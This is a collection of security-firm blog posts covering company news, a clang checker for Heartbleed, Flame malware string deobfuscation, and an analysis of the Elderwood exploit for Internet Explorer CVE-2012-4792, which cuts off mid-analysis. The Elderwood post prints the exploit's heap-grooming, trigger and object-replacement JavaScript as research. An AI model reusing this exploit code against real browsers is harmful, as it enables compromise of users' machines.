We’ve Moved!

Trail of Bits headquarters has moved! Located in the heart of the financial district, our new office features a unique design, cool modern decor, and an open layout that makes us feel right at home.

With fast internet, well-appointed conference rooms, and comfortable workstations, we feel that this is a great place to grow our business.

We are also loving our new commute options. We have easy access to several main subway lines, and for those of us who bike, there is indoor bicycle storage and a Citi Bike station located right outside our building. Oh yeah, there’s also this view:

We’re hiring and we encourage you to apply if you’re interested in joining us!

Dear DARPA: Challenge Accepted.

We are proud to have one of only seven accepted funded-track proposals to DARPA’s Cyber Grand Challenge.

Computer security experts from academia, industry and the larger security community have organized themselves into more than 30 teams to compete in DARPA’s Cyber Grand Challenge — a first-of-its-kind tournament designed to speed the development of automated security systems able to defend against cyberattacks as fast as they are launched. DARPA also announced today that it has reached an agreement to hold the 2016 Cyber Grand Challenge final competition in conjunction with DEF CON, one of the largest computer security conferences in the world.

Our participation in this program aligns with our development of Javelin, an automated system for simulating attacks against enterprise networks. We have assembled a world-class team of experts in software security, capture the flag, and program analysis to compete in this challenge. As much as we wish the other teams luck in this competition, Trail of Bits is playing to win. Game on!

Trail of Bits Releases Capture the Flag Field Guide

Free Online Coursework Allows Students, Professionals to Build Essential Offensive Security Skills

New York, NY (May 20, 2014) – Security researchers at Trail of Bits today introduced the CTF Field Guide (Capture the Flag), a freely available, self-guided online course designed to help university and high school students hone the skills needed to succeed in the fast-paced, offensive competitions known as Capture the Flag.

Capture the Flag events consist of many small challenges that require participants to exercise skills across the spectrum of computer security, from exploit creation and vulnerability discovery to forensics. Participation in such games is widely viewed as a critical step in building computer security expertise, especially for high school and college students considering a career in the field.

Despite the value of CTF events, few high schools and colleges have the resources to mentor students interested in computer security, and often the expertise needed to create and train CTF teams is lacking. The CTF Field Guide will help students build the skills to compete and succeed in these competitions, supplementing their existing coursework in computer security and providing motivated students with the structure and guidance to form their own CTF teams.

The CTF Field Guide is based on course content created by Dan Guido, co-founder and CEO of Trail of Bits and Hacker in Residence at NYU Polytechnic School of Engineering, one of the first universities to offer a cybersecurity program.

Guido is among the few instructors in the country to teach offensive security tactics, and his Penetration Testing and Vulnerability Analysis course is a mainstay of the cybersecurity programs at NYU Engineering. The CTF Field Guide combines elements of Guido’s classes, material Trail of Bits developed in collaboration with the Defense Advanced Research Projects Agency (DARPA) to train military academy students, and reference material from leading security researchers around the world.

“Capture the Flag events can test and improve almost every skill that computer security professionals rely on, but one of the most valuable is mastering offensive maneuvers—learning to think like attackers,” said Guido. “We created the CTF Field Guide to allow anyone interested in boosting their skills, from high school students to working professionals, to benefit from some of the best teaching in the world, free of charge and at their own pace.”

The CTF Field Guide is housed on GitHub, which allows users to contribute to and improve the course material over time. It is also available as a downloadable GitBook that can be viewed as a PDF or ebook. While courses on similar topics have been previously offered online, the CTF Field Guide is the first to be freely available and to allow ongoing collaboration and updates based on real-world attack trends.

Participation in CTF competitions has skyrocketed in recent years. Some of the largest events—DEF CON’s CTF and the NYU Engineering CSAW CTF among them—attract tens of thousands of entrants, and many events now include challenges specifically tailored for young student teams.

Trail of Bits is a sponsor of the High School CTF (HSCTF), the first CTF event designed for high school students by their peers, which attracted more than 1,000 competitors. Guido believes there’s no better time to launch the CTF Field Guide. “Students who competed in these recent games—or who plan to do so in the future—can start the course right now and there’s no question they’ll be better prepared to succeed next year.”

About Trail of Bits

Founded in 2012, Trail of Bits enables enterprises to make better strategic security decisions with its world-class experience in security research, red teaming and incident response. The Trail of Bits management team comprises some of the most recognized researchers in the security industry, renowned for their expertise in reverse engineering, novel exploit techniques and mobile security. Trail of Bits has collaborated extensively with DARPA on the agency’s acclaimed Cyber Fast Track, Cyber Grand Challenge and Cyber Stakes programs. In 2014, the company launched its first enterprise product, Javelin, which simulates attacks to help companies measure and refine their security posture.

Learn more at www.trailofbits.com

Using Static Analysis and Clang To Find Heartbleed

Background

Friday night I sat down with a glass of Macallan 15 and decided to write a static checker that would find the Heartbleed bug. I decided that I would write it as an out-of-tree clang analyzer plugin and evaluate it on a few very small functions that had the spirit of the Heartbleed bug in them, and then finally on the vulnerable OpenSSL codebase itself.

The Clang project ships an analysis infrastructure with its compiler; it’s invoked via scan-build (e.g. scan-build make). scan-build hooks whatever existing make system you have to interpose the clang analyzer into the build process, and the analyzer is invoked with the same arguments as the compiler. This way, the analyzer can ‘visit’ every compilation unit in the program that compiles under clang. There are some limitations to the clang analyzer that I’ll touch on in the discussion section.

This exercise added to my list of things that I can only do while drinking: I have the best success with first-order logic while drinking beer, and I have the best success with clang analyzer while drinking scotch.

Strategy

One approach to identifying Heartbleed statically was proposed by Coverity recently: taint the return values of calls to ntohl and ntohs as input data. One problem with doing static analysis on a big state machine like OpenSSL is that your analysis either has to know the state machine to track which values are attacker-influenced across the whole program, or it has to rely on some kind of annotation in the program that tells the analysis where input data is used.

I like this observation because it is pretty actionable. You mark ntohl calls as producing tainted data, which is a heuristic, but a pretty good one because programmers probably won’t htonl their own data.

What our clang analyzer plugin should do is identify locations in the program where variables are written using ntohl, taint them, and then alert when those tainted values are used as the size parameter to memcpy. Except that isn’t quite right: the use could be safe. We’ll also check the constraints of the tainted values at the location of the call: if the tainted value hasn’t been constrained in some way by the program logic and it’s used as an argument to memcpy, alert on a bug. This could also miss some bugs, but I’m writing this over a 24h period with some scotch, so increasing precision can come later.

Clang analyzer details

The clang analyzer implements a type of symbolic execution to analyze C/C++ programs. Plugging into this framework as an analyzer requires bending your mind around the clang analyzer’s view of program state. This is where I consumed the most scotch.

The analyzer, under the hood, performs a symbolic/abstract exploration of program state. This exploration is flow- and path-sensitive, so it is different from traditional compiler data flow analysis. The analysis maintains a “state” object for each path through the program, and in this state object are constraints and facts about the program’s execution on that path. This state object can be queried by your analyzer, and your analyzer can change the state to include information produced by your analysis.

This was one of my biggest hurdles when writing the analyzer – once I have a “symbolic variable” in a particular state, how do I query the range of that symbolic variable? Say there is a program fragment that looks like this:

int data = ntohl(pkt_data);
if(data >= 0 && data < sizeof(global_arr)) {
 // CASE A
...
} else {
 // CASE B
 ...
}

When looking at this program from the analyzer’s point of view, the state “splits” at the if into two different states A and B. In state A, there is a constraint that data is between certain bounds, and in state B there is a constraint that data is NOT within certain bounds. How do you access this information from your checker?

If your checker calls the “dump” method on its given “state” object, data like the following will be printed out:

Ranges of symbol values:
 conj_$2{int} : { [-2147483648, -2], [0, 2147483647] }
 conj_$9{uint32_t} : { [0, 6] }

In this example, conj_$9{uint32_t} is our ‘data’ value above and the state is in the A state. We have a range on ‘data’ that places it between 0 and 6. How can we, as the checker, observe that there’s a difference between this range and an unconstrained range of, say, [-2147483648, 2147483647]?

The answer is, we create a formula that tests the symbolic value of ‘data’ against some conditions that we enforce, and then we ask the state what program states exist when this formula is true and when it is false. If a new formula contradicts an existing formula, the state is infeasible and no state is generated. So we create a formula that says, roughly, “data > 500” to ask if data could ever be greater than 500. When we ask the state for new states where this is true and where it is false, it will only give us a state where it is false.

This is the kind of idiom used inside of clang analyzer to answer questions about constraints on state. The array bounds checker uses this trick to identify states where the size of an array is not used as a constraint on an index into the array.
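
In checker code, that idiom looks roughly like this (a sketch against the clang analyzer’s SValBuilder and ProgramState APIs; ‘val’ stands in for the symbolic ‘data’ value above):

// Build the formula "val > 500" as a symbolic condition.
SVal cond = svalBuilder.evalBinOpNN(state, BO_GT, val,
                                    svalBuilder.makeIntVal(500, false),
                                    svalBuilder.getConditionType());

if(Optional<DefinedOrUnknownSVal> DV = cond.getAs<DefinedOrUnknownSVal>()) {
  // Ask for the states where the formula is true and where it is false.
  std::pair<ProgramStateRef, ProgramStateRef> states = state->assume(*DV);
  // states.first is non-NULL iff "val > 500" is feasible on this path;
  // states.second is non-NULL iff "val <= 500" is feasible.
}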

Implementation

Your analyzer is implemented as a C++ class. You define different “check” functions that the analyzer calls when it reaches the corresponding points in its exploration of program state. For example, if your analyzer wants to consider the arguments to a function call before the function is called, you create a member method with a signature that looks like this:

void checkPreCall(const CallEvent &Call, CheckerContext &C) const;

Your analyzer can then match on the function about to be (symbolically) invoked. So our implementation works in three stages:

  1. Identify calls to ntohl/ntohs
  2. Taint the return value of those calls
  3. Identify unconstrained uses of tainted data

We accomplish the first and second with a checkPostCall visitor that roughly does this:

void NetworkTaintChecker::checkPostCall(const CallEvent &Call,
                                        CheckerContext &C) const {
  const IdentifierInfo *ID = Call.getCalleeIdentifier();

  if(ID == NULL) {
    return;
  }

  if(ID->getName() == "ntohl" || ID->getName() == "ntohs") {
    ProgramStateRef State = C.getState();
    SymbolRef       Sym = Call.getReturnValue().getAsSymbol();

    if(Sym) {
      // Taint the symbol for the return value and record the new state.
      ProgramStateRef newState = State->addTaint(Sym);
      C.addTransition(newState);
    }
  }
}
Pretty straightforward: we get the return value, if present, taint it, and add the state with the tainted return value as an output of our visit via ‘addTransition’.

For the third goal, we have a checkPreCall visitor that considers a function call’s parameters like so:

void NetworkTaintChecker::checkPreCall(const CallEvent &Call,
                                       CheckerContext &C) const {
  ProgramStateRef State = C.getState();
  const IdentifierInfo *ID = Call.getCalleeIdentifier();

  if(ID == NULL) {
    return;
  }

  if(ID->getName() == "memcpy") {
    SVal SizeArg = Call.getArgSVal(2);

    if(State->isTainted(SizeArg)) {
      SValBuilder      &svalBuilder = C.getSValBuilder();
      Optional<NonLoc> SizeArgNL = SizeArg.getAs<NonLoc>();

      // Only report if the tainted size is insufficiently constrained
      // on this path.
      if(this->isArgUnConstrained(SizeArgNL, svalBuilder, State)) {
        ExplodedNode *loc = C.generateSink();
        if(loc) {
          BugReport *bug = new BugReport(*this->BT,
              "Tainted, unconstrained value used in memcpy size", loc);
          C.emitReport(bug);
        }
      }
    }
  }
}
Also relatively straightforward: our logic to check whether a value is unconstrained is hidden in ‘isArgUnConstrained’, so if a tainted symbolic value has insufficient constraints on it in our current path, we report a bug.
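
A minimal sketch of what ‘isArgUnConstrained’ might look like, using the dual-assume idiom from earlier (the 500 threshold is an arbitrary choice for illustration):

bool NetworkTaintChecker::isArgUnConstrained(Optional<NonLoc> Arg,
                                             SValBuilder &builder,
                                             ProgramStateRef state) const {
  if(!Arg)
    return false;

  // Formula: "size argument > 500"
  SVal cond = builder.evalBinOpNN(state, BO_GT, *Arg,
                                  builder.makeIntVal(500, false),
                                  builder.getConditionType());

  Optional<DefinedOrUnknownSVal> DV = cond.getAs<DefinedOrUnknownSVal>();
  if(!DV)
    return false;

  // If a feasible state exists where the tainted size exceeds the
  // threshold, the program logic hasn't constrained it enough.
  ProgramStateRef canExceed = state->assume(*DV, true);
  return canExceed != nullptr;
}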

Some implementation pitfalls

It turns out that OpenSSL doesn’t use ntohs/ntohl; it has n2s/n2l macros that re-implement the byte-swapping logic. If this were in LLVM IR, it would be tractable to write a “byte-swapping recognizer” that uses algebraic reasoning to prove when a piece of code approximates the semantics of a byte swap.
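
For reference, OpenSSL’s byte-swapping macro looks roughly like this (paraphrased, so treat the details as approximate):

/* Read two bytes from c in network (big-endian) order into s,
   then advance c past them. */
#define n2s(c,s) ((s=(((unsigned int)(c[0])) << 8) | \
                     (((unsigned int)(c[1]))      )), c+=2)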

There is also some behavior that I have not figured out in clang’s creation of the AST for OpenSSL, where calls to ntohs are replaced with __builtin_pre(__x), which has no IdentifierInfo and thus no name. To work around this, I replaced the n2s macro with a call to a function named xyzzy (the result no longer links, but the analyzer runs during compilation, so that doesn’t matter) and adapted my function check from above to look for a function named xyzzy. This worked well enough to identify the Heartbleed bug.

Solution output with demo programs and OpenSSL

First let’s look at some little toy programs. Here is one toy example with output:

$ cat demo2.c

...

int data_array[] = { 0, 18, 21, 95, 43, 32, 51};

int main(int argc, char *argv[]) {
  int   fd;
  char  buf[512] = {0};

  fd = open("dtin", O_RDONLY);

  if(fd != -1) {
    int size;
    int res;

    res = read(fd, &size, sizeof(int));

    if(res == sizeof(int)) {
      size = ntohl(size);

      if(size < sizeof(data_array)) {
        memcpy(buf, data_array, size);
      }

      memcpy(buf, data_array, size);
    }

    close(fd);
  }

  return 0;
}

$ ../docheck.sh
scan-build: Using '/usr/bin/clang' for static analysis
/usr/bin/ccc-analyzer -o demo2 demo2.c
demo2.c:30:7: warning: Tainted, unconstrained value used in memcpy size
      memcpy(buf, data_array, size);
      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1 warning generated.
scan-build: 1 bugs found.
scan-build: Run 'scan-view /tmp/scan-build-2014-04-26-223755-8651-1' to
examine bug reports.

And finally, to see it catching Heartbleed in both locations it was present in OpenSSL, see the following:

[Two screenshots: scan-build reports flagging the tainted, unconstrained memcpy sizes in OpenSSL’s TLS and DTLS heartbeat handlers]

Discussion

The approach needs some improvement: we reason about whether a tainted value is “appropriately” constrained in a very coarse-grained way. Sometimes that’s the best you can do though – if your analysis doesn’t know how large a particular buffer is, perhaps it’s enough to show an analyst “hey, this value could be larger than 5000 and it is used as a parameter to memcpy, is that okay?”

I really don’t like the clang analyzer’s limitation of operating on ASTs. I spent a lot of time fighting with the clang AST representation of ntohs and I still don’t understand what the source of the problem was. I kind of just want to consider a program’s semantics in a virtual machine with very simple semantics, so LLVM IR seems ideal to me. This might just be my PL roots showing, though.

I really do like the clang analyzer’s interface to path constraints. I think that interface is pretty powerful, and once you get your head around phrasing your problem as questions about whether new states satisfying your constraints are feasible, it’s pretty straightforward to write new analyses.

Edit: Code Post

I’ve posted the code for the checker to GitHub.

Introducing Javelin

Javelin

Javelin shows you how modern attackers would approach and exploit your enterprise. By simulating real-time, real-world attack techniques, Javelin identifies which employees are most likely to be targets of spearphishing campaigns, uncovers security infrastructure weaknesses, and compares overall vulnerability against industry competitors. Javelin benchmarks the efficacy of defensive strategies, and provides customized recommendations for improving security and accelerating threat detection. Highly automated, low touch, and designed for easy adoption, Javelin will harden your existing security and information technology infrastructure.

Read more about Javelin on the Javelin Blog.

Semantic Analysis of Native Programs, introducing CodeReason

Introduction

Have you ever wanted to make a query into a native mode program asking about program locations that write a specific value to a register? Have you ever wanted to automatically deobfuscate obfuscated strings?

Reverse engineering a native program involves understanding its semantics at a low level until a high-level picture of functionality emerges. One challenge facing a principled understanding of a native mode program is that this understanding must extend to every instruction used by the program. Your analysis must know which instructions have what effects on memory and registers.

We’d like to introduce CodeReason, a machine code analysis framework we produced for DARPA Cyber Fast Track. CodeReason provides a framework for analyzing the semantics of native x86 and ARM code. We like CodeReason because it provides us a platform to make queries about the effects that native code has on overall program state. CodeReason does this by having a deep semantic understanding of native instructions.

Building this semantic understanding is time-consuming and expensive. Existing systems either have high barriers to entry, don’t do precisely what we want, or don’t apply simplifications and optimizations to their semantics. We want those simplifications because they can reduce otherwise hairy expressions to simple ones that are easy to understand. To motivate this, we’ll give an example of a time we used CodeReason.

Simplifying Flame

Around the time the Flame malware was revealed, some of its binaries were posted on malware.lu. Flame’s string obfuscation scheme is to store each obfuscated string in a structure in global data. The structure looks something like this:


struct ObfuscatedString {
  char  padding[7];
  char  hasDeobfuscated;
  short stringLen;
  char  string[];
};

Each structure has variable-length data at the end, with 7 bytes of data that were apparently unused.

There are two fun things here. First, I used CodeReason to write a string deobfuscator in C. The original program logic performs string deobfuscation in three steps.

The first function checks the hasDeobfuscated field and, if it is zero, returns a pointer to the first element of the string. If the field is not zero, it calls the second function and then sets hasDeobfuscated to zero.
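
In C, the first function’s logic would look something like this (a sketch reconstructed from the behavior just described; the function name is hypothetical, and inplace_buffer_decrypt is the second function, shown next):

char *get_deobfuscated_string(struct ObfuscatedString *s) {
  if(s->hasDeobfuscated != 0) {
    /* Not yet deobfuscated: decrypt in place, then mark it done. */
    inplace_buffer_decrypt((unsigned char *)s->string, s->stringLen);
    s->hasDeobfuscated = 0;
  }
  return s->string;
}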

The second function will iterate over every character in the ‘string’ array. At each character, it will call a third function and then subtract the value returned by the third function from the character in the string array, writing the result back into the array. So it looks something like:


void inplace_buffer_decrypt(unsigned char *buf, int len) {
  int counted = 0;
  while(counted < len) {
    unsigned char *cur = buf + counted;
    unsigned char newChar = get_decrypt_modifier_f(counted);
    *cur -= newChar;
    ++counted;
  }
  return;
}

What about the third function, ‘get_decrypt_modifier_f’? This function is one basic block long and looks like this:


lea ecx, [eax+11h]
add eax, 0Bh
imul ecx, eax
mov edx, ecx
shr edx, 8
mov eax, edx
xor eax, ecx
shr eax, 10h
xor eax, edx
xor eax, ecx
retn

An advantage of having a native code semantics understanding system is that I could capture this block and feed it to CodeReason and have it tell me what the equation of ‘eax’ looks like. This would tell me what this block ‘returns’ to its caller, and would let me capture the semantics of what get_decrypt_modifier does in my deobfuscator.

It would also be possible to decompile this snippet to C; however, what I’m really concerned with is the effect of the code on ‘eax’, not something as high-level as what the code “looks like” in a C decompiler’s view of the world. C decompilers also use a semantics translator, but then proxy the results of that translation through an attempt at translating to C. CodeReason lets us skip the last step and consider just the semantics, which can sometimes be more powerful.

Using CodeReason

Getting this from CodeReason looks like this:


$ ./bin/VEEShell -a X86 -f ../tests/testSkyWipe.bin
blockLen: 28
r
...
EAX = Xor32[ Xor32[ Shr32[ Xor32[ Shr32[ Mul32[ Add32[ REGREAD(EAX), I:U32(0xb) ], Add32[ REGREAD(EAX), I:U32(0x11) ] ], I:U8(0x8) ], Mul32[ Add32[ REGREAD(EAX), I:U32(0xb) ], Add32[ REGREAD(EAX), I:U32(0x11) ] ] ], I:U8(0x10) ], Shr32[ Mul32[ Add32[ REGREAD(EAX), I:U32(0xb) ], Add32[ REGREAD(EAX), I:U32(0x11) ] ], I:U8(0x8) ] ], Mul32[ Add32[ REGREAD(EAX), I:U32(0xb) ], Add32[ REGREAD(EAX), I:U32(0x11) ] ] ]
...
EIP = REGREAD(ESP)

This is cool, because if I implement functions for Xor32, Mul32, Add32, and Shr32, I have this function in C, like so:


unsigned char get_decrypt_modifier_f(unsigned int a) {
  return Xor32(
           Xor32(
             Shr32(
               Xor32(
                 Shr32(
                   Mul32(Add32(a, 0xb), Add32(a, 0x11)),
                   0x8),
                 Mul32(Add32(a, 0xb), Add32(a, 0x11))),
               0x10),
             Shr32(
               Mul32(Add32(a, 0xb), Add32(a, 0x11)),
               0x8)),
           Mul32(Add32(a, 0xb), Add32(a, 0x11)));
}
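
The operator helpers are trivial to supply. One plausible implementation, assuming a 32-bit unsigned int with wrapping semantics:

static unsigned int Xor32(unsigned int a, unsigned int b) { return a ^ b; }
static unsigned int Mul32(unsigned int a, unsigned int b) { return a * b; }
static unsigned int Add32(unsigned int a, unsigned int b) { return a + b; }
static unsigned int Shr32(unsigned int a, unsigned int s) { return a >> s; }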

And this also is cool because it works.


C:\code\tmp>skywiper_string_decrypt.exe
CreateToolhelp32Snapshot

We’re extending CodeReason into an IDA plugin that allows us to make these queries directly from IDA, which should be really cool!

The second fun thing here is that this string deobfuscator has a race condition. If two threads try to deobfuscate the same string at the same time, they will corrupt it forever. This could be bad if you were trying to do something important with an obfuscated string: it would result in passing bad data to a system service or something, which could have very bad effects.

I’ve used CodeReason to attack string obfuscations that were implemented like this:


xor eax, eax
push eax
sub eax, 0x21ece84
push eax

Where the sequence of native instructions turns non-string immediate values into string values (through a clever use of the semantics of two’s complement arithmetic) and then pushes them in the correct order onto the stack, thereby building a string dynamically each time the deobfuscation code runs. CodeReason was able to look at this and, using a very simple peephole optimizer, convert the code into a sequence of memory writes of string immediate values, like:


MEMWRITE[esp] = '.dll'
MEMWRITE[esp-4] = 'nlan'

Conclusions

Having machine code in a form where it can be optimized and understood can be kind of powerful! Especially when it is available from a programmatic library. Using CodeReason, we were able to extract the semantics of string obfuscation functions and automatically implement a string de-obfuscator. Further, we were able to simplify obfuscating code into a form that expressed the de-obfuscated string values on their own. We plan to cover additional uses and capabilities of CodeReason in future blog posts.

iVerify is now available on GitHub

Today we’re excited to release an open-source version of iVerify!

iPhone users now have an easy way to ensure their phones are free of malware.

iVerify validates the integrity of supported iOS devices and detects modifications that malware or jailbreaking would make, without the use of signatures. It runs at boot-time and thoroughly inspects the device, identifying any changes and collecting relevant artifacts for offline analysis.

In order to use iVerify, grab the code from GitHub, put your phone in DFU mode and run the iverify utility. Prompts on screen will indicate whether surreptitious modifications have been made. Visit the GitHub repository for more information about iVerify.

Free Ruby Security Workshop

We interrupt our regularly scheduled programming to bring you an important announcement: On Thursday, June 6th, just in time for SummerCon, we will be hosting a free Ruby Security Workshop in NYC! Signups are first-come, first-served and we only have space for 30 people. Sign up here and we will email the selected participants the location of the training on Tuesday night.

In the last year, many new vulnerabilities and vulnerability classes have been discovered in Ruby applications. These vulnerabilities make use of features specific to the Ruby language and common idioms present in large Ruby projects, such as serialization and deserialization of data in the YAML format. As these vulnerability classes were initially discovered in popular and well-studied open source software, it’s extremely likely that they occur in applications throughout the Ruby ecosystem. These applications frequently represent lucrative targets for attackers, and with the appearance of new and easily exploitable bug classes, the potential for targeted and mass exploitation of Ruby programs has been demonstrated to the world. In this workshop, we aim to bridge a knowledge and skills gap by bringing information about these new vulnerability classes to software developers.

Our Ruby Security Workshop will be led by Hal Brodigan (@postmodern_mod3) and covers recent Ruby on Rails vulnerability classes, their root causes, and exercises where students develop exploits for real-world vulnerabilities. Attendees will learn the patterns behind the vulnerabilities and develop software engineering strategies to avoid introducing these flaws into their projects.

If you’re in the city for SummerCon and interested in attending on Thursday, fill out our signup form and selected participants will be sent more info tomorrow. We’re excited to bring you programs like this and we hope to see you there!

Writing Exploits with the Elderwood Kit (Part 2)

In the third part of our five-part series, we investigate how the toolkit user gained control of program flow and what their strategy means for the reliability of their exploit.

Last time, we talked about how the Elderwood kit does almost everything for the kit user except give them a vulnerability to use. We think it is up to the user to discover a vulnerability, trigger and exploit it, then integrate it with the kit. Our analysis indicates that their knowledge of how to do this is poor and the reliability of the exploit suffered as a result. In the sections that follow, we walk through each section of the exploit that the user had to write on their own.

The Document Object Model (DOM)

The HTML Document Object Model (DOM) is a representation of an HTML page, used for accessing and modifying properties. Browsers provide an interface to the DOM via JavaScript. This interface allows websites to have interactive and dynamically generated content. This interface is very complicated and is subject to many security flaws such as the use-after-free vulnerability used by the attackers in the CFR compromise. For example, the Elderwood group has been responsible for discovering and exploiting at least three prior vulnerabilities of this type in Internet Explorer.

Use-after-Free Vulnerabilities

Use-after-free vulnerabilities occur when a program frees a block and then attempts to use it at some later point in program execution. If, before the block is reused, an attacker is able to allocate new data in its place then they can gain control of program flow.

Exploiting a Use-after-Free

  1. Program allocates and then later frees block A
  2. Attacker allocates block B, reusing the memory previously allocated to block A
  3. Attacker writes data into block B
  4. Program uses freed block A, accessing the data the attacker left there
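
Sketched in C++ with hypothetical stand-in types (this is not Internet Explorer’s code; whether the allocator actually reuses block A depends on heap state, and arranging that reuse is exactly what the grooming described below is for):

#include <cstring>

struct CButtonLike {                      // stand-in for the freed object;
  virtual void onClick() {}               // the vtable pointer is its first field
};

void sketch() {
  CButtonLike *stale = new CButtonLike;   // 1. program allocates block A...
  delete stale;                           //    ...then frees it, keeping a pointer

  // 2-3. a same-sized allocation may reuse block A; the attacker fills it,
  // placing a chosen value where the vtable pointer used to be
  char *replacement = new char[sizeof(CButtonLike)];
  const void *fakeVtable = reinterpret_cast<const void *>(0x10ab0d0c);
  std::memcpy(replacement, &fakeVtable, sizeof(fakeVtable));

  // 4. the program uses the stale pointer; the virtual call dispatches
  // through the attacker's value (undefined behavior, shown only to
  // illustrate how control of program flow is gained)
  stale->onClick();
}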

In order to take advantage of CVE-2012-4792, the exploit allocated and freed a CButton object. While a weak reference to the freed object was maintained elsewhere in Internet Explorer, the exploit overwrote the CButton object with their own data. The exploit then triggered a virtual function call on the CButton object, using the weak reference, resulting in control of program execution.

Prepare the Heap

After 16 allocations of the same size occur, Internet Explorer will switch to using the Low Fragmentation Heap (LFH) for further heap allocations. Since these allocations exist on a different heap, they are not usable for exploitation and have to be ignored. To safely skip over the first 16 allocations, the exploit author creates 3000 string allocations of a similar size to the CButton object by assigning the className property on a div tag.

var arrObject = new Array(3000);
var elmObject = new Array(500);
for (var i = 0; i < arrObject.length; i++) {
	arrObject[i] = document.createElement('div');
	arrObject[i].className = unescape("ababababababababababababababababababababa");
}

The contents of the chosen string, repeated “ab”s, are not important. What is important is the size of the allocation it creates: the 41-character string is 82 bytes of UTF-16 data, or 84 bytes with its null terminator. The LFH has an 8-byte granularity for allocations less than 256 bytes, so allocations between 80 and 88 bytes will be allocated from the same area. Here is an example memory dump of what the string in memory would look like:

00227af8  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b08  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b18  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b28  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b38  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b48  61 00 00 00 00 00 00 00-0a 7e a8 ea 00 01 08 ff  a........~......

Then, the exploit author assigns the className of every other div tag to null, thereby freeing the previously created strings when CollectGarbage() is called. This creates holes in the allocated heap memory and a predictable pattern of allocations.

for (var i = 0; i < arrObject.length; i += 2) {
	arrObject[i].className = null;
}
CollectGarbage();

Next, the author creates 500 button elements. As before, they free every other one to create holes and call CollectGarbage() to enable reuse of the allocations.

for (var i = 0; i < elmObject.length; i++) {
	elmObject[i] = document.createElement('button');
}
for (var i = 1; i < arrObject.length; i += 2) {
	arrObject[i].className = null;
}
CollectGarbage();

In one of many examples of reused code in the exploit, the JavaScript array used for heap manipulation is called arrObject. This happens to be the variable name given to an example of how to create arrays found on page 70 of the JavaScript Cookbook.

Trigger the Vulnerability

The code below is responsible for creating the use-after-free condition. The applyElement and appendChild calls create the right conditions and new allocations. The free will occur after setting the outerText property on the q tag and then calling CollectGarbage().

try {
	e0 = document.getElementById("a");
	e1 = document.getElementById("b");
	e2 = document.createElement("q");
	e1.applyElement(e2);
	e1.appendChild(document.createElement('button'));
	e1.applyElement(e0);
	e2.outerText = "";
	e2.appendChild(document.createElement('body'));
} catch (e) {}
CollectGarbage();

At this point, there is now a pointer to memory that has been freed (a stale pointer). In order to continue with the exploit, the memory it points to must be replaced with attacker-controlled data and then the pointer must be used.

Notably, the vulnerability trigger is the only part of the exploit that is wrapped in a try/catch block. In testing, we confirmed that this try/catch is not a necessary condition for triggering the vulnerability or for successful exploitation. If the author were concerned about unhandled exceptions, they could have wrapped all their code in a try/catch instead of only this part. This condition suggests that the vulnerability trigger is separate from any code the developer wrote on their own and may have been automatically generated.

Further, the vulnerability trigger is the one part of the exploit code that a fuzzer can generate on its own. Such a security testing tool might have wrapped many DOM manipulations in try/catch blocks on every page load to maximize the testing possible without relaunching the browser. Given the number of other unnecessary operations left in the code, it is likely that the output of a fuzzer was pasted into the exploit code and the try/catch it used was left intact.

Replace the Object

To replace the freed CButton object with memory under their control, the attacker consumes 20 allocations from the LFH and then targets the 21st allocation for the replacement. The choice to target the 21st allocation was likely made through observation or experimentation, rather than precise knowledge of heap memory. As we will discuss in the following section, this assumption leads to unreliable behavior from the exploit. If the author had a better understanding of heap operations and changed these few lines of code, the exploit could have been much more effective.

for (var i = 0; i < 20; i++) {
	arrObject[i].className = unescape("ababababababababababababababababababababa");
}
window.location = unescape("%u0d0c%u10abhttps://www.google.com/settings/account");

The window.location line has two purposes: it creates a replacement object and triggers the use of the stale pointer. As with almost every other heap allocation created for this exploit, the unescape() function is called to create a string. This time it is slightly different: the exploit author uses %u encoding to fully control the first DWORD in the allocation, the vtable pointer of an object.

For the replaced object, the memory will look like this:

19eb1c00  10ab0d0c 00740068 00700074 003a0073  ….h.t.t.p.s.:.
19eb1c10  002f002f 00770077 002e0077 006f0067  /./.w.w.w...g.o.
19eb1c20  0067006f 0065006c 0063002e 006d006f  o.g.l.e...c.o.m.
19eb1c30  0073002f 00740065 00690074 0067006e  /.s.e.t.t.i.n.g.
19eb1c40  002f0073 00630061 006f0063 006e0075  s./.a.c.c.o.u.n.
19eb1c50  00000074 00000061 f0608e93 ff0c0000  t...a.....`.....

When window.location is set, the browser goes to the URL provided in the string. This change of location will free all the allocations created by the current page since they are no longer necessary. This triggers the use of the freed object and this is when the attacker gains control of the browser process. In this case, this causes the browser to load “/[unprintablebytes]https://www.google.com/settings/account” on the current domain. Since this URL does not exist, the iframe loading the exploit on the CFR website will show an error page.

In summary, the exploit overwrites a freed CButton object with data that the attacker controls. In this case, a very fragile technique to overwrite the freed CButton object was used, and the exploit fails to reliably gain control of execution on exploited browsers as a result. Instead of overwriting a large number of objects that may have been recently freed, the exploit writers assume that the 21st object they overwrite will always be the correct freed CButton object. This decreases the reliability of the exploit because it assumes a predetermined location of the freed CButton object in the freelist.

Now that the vulnerability can be exploited, it can be integrated with the kit by using the provided address we mentioned in the previous post, 0x10ab0d0c. By transferring control to the SWF loaded at that address, the provided ROP chains and staged payload will be run by the victim.

Reliability

Contrary to popular belief, it is possible for an exploit to fail even on a platform that it “supports.” Exploits for use-after-frees rely on complex manipulation of the heap to perform controlled memory allocations. Assumptions about the state of memory may be broken by total available memory, previously visited websites, the number of CPUs present, or even changes to software running on the host. Therefore, we consider exploit reliability to be a measure of successful payload execution vs total attempts in these various scenarios.

We simulated real-world use of the Elderwood exploit for CVE-2012-4792 to determine its overall reliability. We built a Windows XP test system with versions of Internet Explorer, Flash and Java required by the exploit. Our testing routine started by going to a random website, selected from several popular websites, and then going to our testing website hosting the exploit. We think this is a close approximation of real-world use since the compromised website is not likely to be anyone’s homepage.

Under these ideal conditions, we determined the reliability of the exploit to be 60% in our testing. Although it is unnecessary to create holes to trigger the vulnerability or to exploit it successfully, as described in the previous code snippets, we found that reliability drops to about 50% if these operations are not performed. We describe some of the reasons for such low reliability below:

